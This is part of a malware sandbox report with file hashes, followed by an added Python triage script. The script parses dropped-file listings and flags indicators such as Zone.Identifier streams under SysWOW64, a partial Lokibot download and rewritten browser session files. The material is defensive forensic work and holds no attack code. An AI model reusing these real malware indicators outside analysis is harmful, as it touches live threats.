| SHA256 | a81c9809b8ce94789c88d2a682dfa651c99e49eafd5b4418dabbeabfb9b74115 |
| SHA512 | 43f230f8483dc59df0ebf31da3137506a77d8f9f6afef48fc98a266a063ff5e15251ed73eb0dc7e21deb2fa0577fb6101399ae4daef005a568f8c4cf9fd74c5e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| MD5 | a02e15c65c50ad5e4a24b376f9adcc17 |
| SHA1 | 251bab9b856426ece9ba206328208eaaf065c80d |
| SHA256 | bcbd46640e121a38c5b43a0f490252d007a00432cea417334290df84c073f541 |
| SHA512 | 9d2fdd05925b095bd30b79d10b53917608b78c570eb8ea0674e58db1676fe5ab9fb50d33068a006128968fd704f2395fbc4dc11b364d01714fe74a80642fb7c5 |
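The dropped-file listing above only becomes useful to a responder once it is turned into structured indicators. The following Python is an added example, not part of the sandbox report: it parses the listing's own format (a path line followed by `| MD5 | … |` style hash rows, and `memory/<pid>-<seq>-<base>-<end>-memory.dmp` lines for dumped regions), checks that each hash has the length its algorithm requires, and flags the entries a triage analyst would look at first: the `:Zone.Identifier` alternate data streams written under `C:\Windows\SysWOW64` (the report's "NTFS ADS" and "Mark-of-the-Web Bypass" signatures), executables dropped under the Windows directory, partial browser downloads in `Downloads`, and paths that appear several times with different SHA256 values, meaning the file was rewritten during detonation (the repeated `recovery.baklz4` entries). The sample input is a handful of lines copied from the listing; the flag names, the extension set and the grouping logic are this example's own choices, not anything the sandbox emits.

```python
import re
from collections import defaultdict

# Listing format as it appears on the page: path line, then '| ALGO | hex |' rows.
HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
MEM_LINE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9a-fA-F]+)-0x([0-9a-fA-F]+)-memory\.dmp$")
PATH_LINE = re.compile(r"^[A-Za-z]:\\")
EXEC_EXTS = {"exe", "dll", "sys", "com", "scr"}  # assumption: what counts as "executable"

# Flag names are this example's own vocabulary, not the sandbox's signature names.
FLAG_ADS = "ntfs_ads_zone_identifier"         # ':Zone.Identifier' stream written by the sample
FLAG_WINDIR_EXE = "executable_under_windows_dir"
FLAG_PART = "partial_browser_download"
FLAG_REWRITTEN = "rewritten_multiple_sha256"   # same path, several distinct SHA256 values
FLAG_BAD_HASH = "malformed_hash"


def parse_listing(text):
    """Return records {'kind': 'file'|'memory', 'path', 'hashes', ...} in listing order.
    Hash rows that precede any path line (a table cut off by pagination) are skipped."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_LINE.match(line)
        if m:
            pid, _seq, base, end = m.groups()
            records.append({"kind": "memory", "path": line, "pid": int(pid),
                            "base": int(base, 16), "end": int(end, 16), "hashes": {}})
            current = None
            continue
        if PATH_LINE.match(line):
            current = {"kind": "file", "path": line, "hashes": {}}
            records.append(current)
            continue
        m = HASH_ROW.match(line)
        if m and current is not None:
            current["hashes"][m.group(1)] = m.group(2).lower()
    return records


def _extension(path_lower):
    main = path_lower[2:].split(":")[0]   # drop 'c:' and any ':stream' ADS suffix
    return main.rsplit(".", 1)[-1] if "." in main else ""


def flag_records(records):
    """Map path -> set of flags for the file records worth a closer look."""
    flags, sha256_by_path = defaultdict(set), defaultdict(set)
    for r in records:
        if r["kind"] != "file":
            continue
        path, low = r["path"], r["path"].lower()
        ext = _extension(low)
        if any(len(v) != HASH_LENGTHS[a] for a, v in r["hashes"].items()):
            flags[path].add(FLAG_BAD_HASH)
        if ":zone.identifier" in low:
            flags[path].add(FLAG_ADS)
        if low.startswith("c:\\windows\\") and ext in EXEC_EXTS:
            flags[path].add(FLAG_WINDIR_EXE)
        if "\\downloads\\" in low and ext == "part":
            flags[path].add(FLAG_PART)
        if "SHA256" in r["hashes"]:
            sha256_by_path[path].add(r["hashes"]["SHA256"])
    for path, shas in sha256_by_path.items():
        if len(shas) > 1:
            flags[path].add(FLAG_REWRITTEN)
    return dict(flags)


def memory_regions_by_pid(records):
    """Group dumped regions by PID, collapsing repeat dumps of the same range."""
    regions = defaultdict(set)
    for r in records:
        if r["kind"] == "memory":
            regions[r["pid"]].add((r["base"], r["end"]))
    return dict(regions)


def sha256_sweep_list(records):
    """Sorted, de-duplicated SHA256 values, i.e. what you would hand to an EDR hash sweep."""
    return sorted({r["hashes"]["SHA256"] for r in records if "SHA256" in r["hashes"]})


# Sample input: a handful of lines copied verbatim from the listing above.
SAMPLE = r"""
C:\Windows\SysWOW64\drivers\spoclsv.exe:Zone.Identifier
| MD5 | 3057de24b59f6493088d85c4ce9c3a43 |
| SHA256 | e1fbb465fd1884ea2bfa80cdf664b890373d626129a25753c280febebad95eaa |
memory/3796-6159-0x0000000001000000-0x0000000001026000-memory.dmp
memory/3796-6166-0x0000000001000000-0x0000000001026000-memory.dmp
memory/3000-6167-0x0000000001000000-0x0000000001026000-memory.dmp
C:\Users\Admin\Downloads\Lokibot.LK0n4mqN.exe.part
| MD5 | f52fbb02ac0666cae74fc389b1844e98 |
| SHA256 | a885b1f5377c2a1cead4e2d7261fab6199f83610ffdd35d20c653d52279d4683 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| SHA256 | a1b6a82b1dd14b696f618f7212bd977bb203c1bca0bef6c3f6f856271aa0d27d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bxumog7h.default-release\sessionstore-backups\recovery.baklz4
| SHA256 | 84cc059937a9631cb19aded0eb4cb3b134bd6b4d66d3153343cbf77778158d35 |
"""

if __name__ == "__main__":
    recs = parse_listing(SAMPLE)
    for path, fl in sorted(flag_records(recs).items()):
        print(f"{path}\n    {', '.join(sorted(fl))}")
    print("memory regions:", memory_regions_by_pid(recs))
    print("sweep list:", sha256_sweep_list(recs))
```

Run it against the full report text and the flagged set is short: the two `:Zone.Identifier` streams under `SysWOW64`, the `.exe.part` downloads, and the browser session files that changed hash between snapshots. The repeated memory-region lines collapse to one range per PID, which is the region to pull out of the dump first.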